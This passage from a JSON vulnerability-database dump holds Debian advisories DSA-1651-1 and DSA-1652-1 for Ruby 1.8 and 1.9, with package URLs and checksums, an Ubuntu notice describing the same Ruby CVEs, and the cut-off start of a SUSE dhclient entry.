ba212e89d3ed795826291b8b83b755bf\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 1808838 f27c1864da2a5f200eba5f856ab9ec4d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 217620 c293eeeff7ea8f7b2662543f1787e382\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 237222 ba705f2b59847458ae944c9d88cfa29e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 777068 75b95c3a7627b97ed7cb6b65b2d430d4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 372912 2082b7a24c82d5c444d9a8e9971d153c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 1844652 17411d10899861a4e0db3f2b58aa2f04\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 327718 deaec089c668e98c3826f9c3f9c16906\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217444 091b5e0da9d7f8cab82fbaac51555800\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 1849530 a4eb5998265e1c0d10e47d9b3fd3376a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 371458 38d13d9c042fa13cb83e056dd6f75876\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 1855840 f311eafe38b79f66c8ed62d750516e3c\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 235460 c8e69420f67a74626d536b1e0634a5ee\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 884264 cb34a6a0e54e9699c2cc2527721e334a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217506 f0ee0fdfef50c2442f8ef375e1830575\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217974 62409b7918e14178a04f381f14b0b009\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 822856 9506219f2b044210b34532e0900c843d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 216666 1fdc236fbbcc05ec4dcb69f287e26d4a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 372806 a217f49c1f19fa3c8fdcebc6120b89e7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 1843374 5f6e40930829a86a4694231a1312e5b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 216752 7e5681d7aa0e675b3fe26e83f146ac94\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 1793464 023e643cbaca8191e5c213e228a59150\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 317666 4e0e420084673e075456a2cc78102cf2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 215972 20c5e03b7c7cad010b849fdcd77f9dbf\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 235354 2ce73be64e9f94b1beff935e7ffcba2f\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-10-12T09:38:22", "published": "2008-10-12T09:38:22", "id": "DEBIAN:DSA-1652-1:B2D5C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00244.html", "title": "[SECURITY] [DSA 1652-1] New ruby1.9 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-11-11T13:20:16", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1651-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 12, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.8\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2008-3655 CVE-2008-3656 CVE-2008-3657 CVE-2008-3790 CVE-2008-3905\n\nSeveral vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\n Keita Yamaguchi discovered that several safe level restrictions\n are insufficiently enforced.\n \nCVE-2008-3656\n\n Christian Neukirchen discovered that the WebRick module uses\n inefficient algorithms for HTTP header splitting, resulting in\n denial of service through resource exhaustion.\n\nCVE-2008-3657\n\n It was discovered that the dl module doesn't perform taintness\n checks.\n\nCVE-2008-3790\n\n Luka Treiber and Mitja Kolsek discovered that recursively nested\n XML entities can lead to denial of service through resource\n exhaustion in rexml.\n\nCVE-2008-3905\n\n Tanaka Akira discovered that the resolv module uses sequential\n transaction IDs and a fixed source port for DNS queries, which\n makes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.8.5-4etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.7.72-1.\n\nWe recommend that you upgrade your ruby1.8 packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz\n Size/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.dsc\n Size/MD5 checksum: 1079 4c7df61bd710db620b87ae0a3b98d388\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.diff.gz\n Size/MD5 checksum: 142603 f7c9366a3e04f00f5d4e7deb5d27eaf9\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 1241006 d8312745f5bf656d950323c6c9761e1e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 211002 1b5eefc0ee08f8224b14e9cc887c408e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 245020 e16a6c9adf8603359b5031e46185bf25\n http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 235612 69142939deabd04310455bb13f288c66\n http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 310244 e321a815c462f98b404b8c1665d1b55f\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 903552 ad6a8ddd2bf50091f4379509c7b6cef4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1869012 1a2090d92784326905495c96fe508bf2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 198226 b11408bce9fbb392955416fb76d3f6b8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 199160 e087c534968b3ee42d5c1a8eb271ffb0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1638944 58b67c19df5d4394619792d1b8b40c03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 199128 5ff5a9ca775487dcd3eb6d1e1d4eb180\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 219386 d12ee43d6a3f38b98852fedc2349d3d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1075242 ce403140ff57e22f5260226ff3d9325c\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 301056 98e0e061f488d2b111f032a19d5a1060\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1068652 90b93dcde06d9ddcdee05ace2c42bb9e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 217282 f7c81dbf89b107a334ecd4bb4da66ba6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 198082 006299a09bf2074c481322dfbce9dfe6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 302902 6ef6a2d83f8b158b62ea62f3c4bba3fa\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1586654 9d7b4530804e8089a08a95c39bdeabbe\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 748606 c07117a39289e01786fb9ee7a27a1829\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1864338 a6e21b1b7dca462d5fb45689fe092150\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 197638 f6bb914b21492cf68cb1c4558e4ac644\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 198694 4757a7c9b578208d761fe2ccdce3fa41\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 200220 2d8704ff62159bb1e8c2fc635e9cb3b5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 199810 4e51aa246f1602dec04095780c0f5170\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1677464 394c17e4c1e40082701773314c3310e0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1869130 04510cbc8347e4cd055f22b11a26b234\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 824102 b40a7f34f9401e1461f2211c904d3153\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1042102 f7f16a8ffb6be3a6a874b49be5904da8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 316154 82f7dcc15c9ef9c542b12830910c72d4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 199118 6c2239c266c6e7653449780d6ab18f71\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 219164 2ad50197b6cf436a728c5b615a52a046\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 999668 64201f397337b7478893c08afc261e00\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 293708 2327aefddae4e2dd58e9387e36a3934c\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 219408 e3cef11245e5554bef15f5598df21a8f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 197598 56ccc12092d5296e8156c1bc4f411119\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 719716 329bf36bc69b73ac908d6131e12a9933\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 198252 e5df4a73eea74976f81949cfc085c722\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 1856646 f839ef877cc1d905f20868ac29d8c6d6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 197916 221e994fe9132b0121ae1c1aef4d1a71\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 1534674 aff183539b7a3ffb37078d263b4c0fc4\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 201426 7700f382729ccb1bf36b7361eda4e1e6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 330536 de290038777d785a40b96ecde67bcb79\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 202400 425437ebd7a25ddcc24f0b00643e0e15\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 971614 157129fd20a8e99bb060eb16d04b9b1e\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1895636 42981c9c01f3bfe0c29d9c89c67456ea\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 218566 73418bc1a694edf6666a3bef64ab66b8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1861876 81df0b92b58078d1414bca3298a801fd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 203346 861ceb05ebf6549fa2872f2f24eafdbd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1026222 1c6b059f43c36a3d2195fb071a21c0c0\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 196588 0b12b7621be85e03e3ccf9bb8bf18252\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 802442 2a8e096b0bdec5cf68ca800bab083058\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 217920 f7ad5607292040314c621508996c10e3\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 197376 ceef5241e870f21a04406000cfe861f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 281460 585fe80dfa9e975314e6df5ec9f35490\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1085282 94a0aa16383ec7f2ab88d742cead73c2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1850952 26828e1d9dc0b6d24cfc9a8f5ea1bb33\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1540352 a1c65ec2cd909491de849c9907d2eabc\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 197514 118cfb3032dd4b79691ba0f79341bcc4\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 197666 42073374de4e32b274d2a485896d0734\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1060018 eb935e3e4592e2ac723b87227258526a\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 279206 21f76e4afe491f2ceaaa90215e2e6dab\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 198014 6ec3efd9b594a9cc2759d95b61f2a64a\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1538558 725d0012a98297cc4ae2c2aa6d76e73f\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 218098 a75856178c8addc09ae0db8dd8349b88\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 793332 fff033a8fde91eeaa458f2be3252a7bf\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1830324 a816a6d7bb2059cead4d5be647e66c03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 197072 cc83f3923ec214e99dfb87552813e524\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 219368 5033aca578c0a97d044b136adf2120d2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 293966 13f4c179f750c4ef69229f5f8c714908\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199990 900f11656f1bbfb7143c96eb6eca55b2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199672 b36fcd86eae4a996aceea9f51ed82b6f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1592660 53543d9b925d742e2dd0bb21842d9484\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199450 7eecb4e14d914ef9ce18297dafeb4beb\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1837328 fc2549416dba4e379f56755dc11cf3d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1108684 93123428d72447a94854d3ffa7feba05\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 718932 c59ae18feb43ed2dca6300adabb1a9e4\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 305246 14e3e5cddc2398095a39f5e7db03d50d\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 779454 22db8f14e5f3524693854a896d25dc73\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1620164 25eb518ccfa74c490cd894a96d464743\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 199400 7f87e9c92d21d9f0cc27168c15b09e90\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 198604 f9b34b538bd4fae60bf1cfd357d78977\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 198918 8e6b256da2d93404909bffaf9741cb8a\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 217956 e0603b2614b4402e24763265af2a69aa\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1838970 5eb6c09970d3a051d6fe1753893c7222\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1051972 d10d44795254610d6f4becff47d5c3a7\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 961570 c65f0632dc01bc50d209487741fc41f4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 1833402 426ef4a80f6c366231813b596c9bf46f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197920 006e1097f7fdc7ac9a8b89413a56f2fe\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 1543240 4c4c3f00fd078b2fa6778a3245569e87\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197144 2cd715ed20b9c63c0c264adb6ed1c000\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197866 71c08be787f0a4f683b91fc539ade3c3\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 741182 9c970b4ccbba6cba80d8284218d33ef4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 296052 9567adab606aecadbee3006a572f0965\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 217898 b375854870d898692db953c88bf80e53\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-10-12T09:37:30", "published": "2008-10-12T09:37:30", "id": "DEBIAN:DSA-1651-1:0FC77", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00243.html", "title": "[SECURITY] [DSA 1651-1] New ruby1.8 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:39:57", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-1447", "CVE-2008-3443", "CVE-2008-2376", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Akira Tagoh discovered a vulnerability in Ruby which lead to an integer \noverflow. If a user or automated system were tricked into running a \nmalicious script, an attacker could cause a denial of service or \npossibly execute arbitrary code with the privileges of the user \ninvoking the program. (CVE-2008-2376)\n\nLaurent Gaffie discovered that Ruby did not properly check for memory \nallocation failures. If a user or automated system were tricked into \nrunning a malicious script, an attacker could cause a denial of \nservice. (CVE-2008-3443)\n\nKeita Yamaguchi discovered several safe level vulnerabilities in Ruby. \nAn attacker could use this to bypass intended access restrictions. \n(CVE-2008-3655)\n\nKeita Yamaguchi discovered that WEBrick in Ruby did not properly \nvalidate paths ending with \".\". A remote attacker could send a crafted \nHTTP request and cause a denial of service. (CVE-2008-3656)\n\nKeita Yamaguchi discovered that the dl module in Ruby did not check \nthe taintness of inputs. An attacker could exploit this vulnerability \nto bypass safe levels and execute dangerous functions. (CVE-2008-3657)\n\nLuka Treiber and Mitja Kolsek discovered that REXML in Ruby did not \nalways use expansion limits when processing XML documents. If a user or \nautomated system were tricked into open a crafted XML file, an attacker \ncould cause a denial of service via CPU consumption. (CVE-2008-3790)\n\nJan Lieskovsky discovered several flaws in the name resolver of Ruby. A \nremote attacker could exploit this to spoof DNS entries, which could \nlead to misdirected traffic. This is a different vulnerability from \nCVE-2008-1447. (CVE-2008-3905)", "edition": 5, "modified": "2008-10-10T00:00:00", "published": "2008-10-10T00:00:00", "id": "USN-651-1", "href": "https://ubuntu.com/security/notices/USN-651-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:52:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2009-1886", "CVE-2009-1904", "CVE-2009-2042", "CVE-2008-3443", "CVE-2009-0642", "CVE-2008-3657", "CVE-2009-0692", "CVE-2008-3905", "CVE-2008-3790", "CVE-2009-1888", "CVE-2008-3656"], "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending an overlong subnet field (CVE-2009-0692). In theory a malicious DHCP server could exploit the flaw to execute arbitrary code as root on machines using dhclient to obtain network settings. Newer distributions (SLES10+, openSUSE) do have buffer overflow checking that guards against this kind of stack overflow though. So actual 